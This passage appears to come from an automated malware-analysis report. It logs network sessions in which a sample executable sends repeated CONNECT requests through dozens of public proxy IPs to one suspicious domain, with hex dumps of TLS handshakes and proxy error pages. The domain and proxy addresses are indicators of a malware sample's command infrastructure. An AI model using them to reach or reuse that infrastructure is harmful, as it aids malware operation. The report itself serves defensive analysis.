                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 76 65 72 69 66 79 20 74 68 61 74 20 79 6f 75 0a 61 72 65 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>407 Proxy Authentication Required</title></head><body><h1>Proxy Authentication Required</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1715192.168.2.45464660.191.244.1431286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.555510044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.647152901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.647294044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1716192.168.2.45479977.91.74.77806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.582108021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.796190023 CET154INHTTP/1.1 301 Moved Permanently
                                                                                                      Location: https://heygirlisheeverythingyouwantedinaman.com:443
                                                                                                      Date: Fri, 23 Feb 2024 08:45:30 GMT
                                                                                                      Content-Length: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1717192.168.2.454785211.222.252.18781976812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.602014065 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1718192.168.2.45461872.195.34.5941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.653520107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1719192.168.2.449822161.97.173.42236706812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.665424109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.683799982 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.865829945 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:42.865845919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:54.865520954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:06.865526915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:18.959266901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1720192.168.2.452895161.97.147.193552836812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.670562029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.834439039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:36.929053068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1721192.168.2.4547928.222.145.238156736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.691385031 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1722192.168.2.45479660.188.102.225180806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.754401922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1723192.168.2.45479327.77.237.9310806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.804121017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1724192.168.2.454821154.12.178.107299856812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.815170050 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.475203991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1725192.168.2.454095186.215.196.5031286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.848093033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.902631044 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1726192.168.2.45484882.113.157.122312806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.848464012 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1727192.168.2.45488443.153.55.2054436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.862266064 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1728192.168.2.45484652.67.10.183806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.862494946 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.064951897 CET154INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 23 Feb 2024 08:45:30 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      X-Powered-By: PHP/5.3.6-13ubuntu3.6
                                                                                                      Server: aserve
                                                                                                      Content-Length: 0
                                                                                                      Feb 23, 2024 09:45:31.660226107 CET202OUTData Raw: 16 03 03 00 c5 01 00 00 c1 03 03 65 d8 5b 2b a0 17 6f ac 65 6e 4d fb 03 44 25 ad 46 37 69 58 7a be d4 40 c9 2c b0 58 b0 8f 3f cf 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                      Data Ascii: e[+oenMD%F7iXz@,X?*,+0/$#('=<5/n-+(heygirlisheeverythingyouwantedinaman.com#
                                                                                                      Feb 23, 2024 09:45:31.862529039 CET1129INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 49 67 8e 4f d4 91 9f ec 5e f4 85 d3 2b eb 31 51 84 96 cd 69 e4 d3 98 00 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 e8 0b 00 02 e4 00 02 e1 00 02 de 30
                                                                                                      Data Ascii: =9IgO^+1QiDOWNGRD0000*H03110/U(heygirlisheeverythingyouwantedinaman.com0240223084423Z260222084423Z03110/U(heygirlisheeverythingyouwantedinaman.c
                                                                                                      Feb 23, 2024 09:45:33.888140917 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 19 85 6b ca 29 d2 a7 82 b6 49 c5 fa 22 92 39 e3 98 5a 2b 45 b5 bc 0d e4 af 95 dc 38 7a 94 8e 50 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 65 99 74 f2 25 7f 9f 9f f8 5f c8 ec 6a 3b 91 54 a2 ce 5e d9 7f
                                                                                                      Data Ascii: %! k)I"9Z+E8zP(et%_j;T^GgM
                                                                                                      Feb 23, 2024 09:45:34.088323116 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 8f 9b ce 58 5b 4d 20 21 ab 6e e2 c0 56 b1 9c c2 f6 17 70 36 cd 18 cc 5a 3a 19 4d 65 73 15 c8 bd 41 96 37 62 25 26 20 1d
                                                                                                      Data Ascii: (X[M !nVp6Z:MesA7b%&


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1729192.168.2.45291092.241.92.218148886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.862529039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1730192.168.2.454549199.58.184.9741456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.873017073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1731192.168.2.454685162.241.207.217806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.895776033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:38.268132925 CET851INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:38 GMT
                                                                                                      Server: Apache
                                                                                                      Content-Length: 675
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 72 6f 6f 74 40 73 65 72 76 65 72 2e 61 72 69 61 62 69 72 64 70 6f 64 75 63 74 73 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at root@server.ariabirdpoducts.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1732192.168.2.454865104.16.195.74806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.895900011 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.983408928 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:30 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1733192.168.2.454075115.171.217.4878916812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.908314943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1734192.168.2.45382327.75.149.16910806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.932368040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1735192.168.2.4548458.213.128.90200026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.936608076 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1736192.168.2.452906124.105.55.176309066812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.936829090 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1737192.168.2.449938167.86.69.142351966812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:30.942070961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:33.943893909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.037790060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:43.037575006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:55.037482023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:07.037436008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:19.209271908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1738192.168.2.454890172.67.182.38806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.004813910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.092138052 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:31 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1739192.168.2.45487491.142.222.84557186812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.014925957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.646987915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1740192.168.2.453589103.230.126.123443416812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.033262014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1741192.168.2.454841116.107.182.4110806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.033973932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1742192.168.2.454887173.255.119.18806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.045042038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1743192.168.2.454864196.20.125.13380836812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:31.058995962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
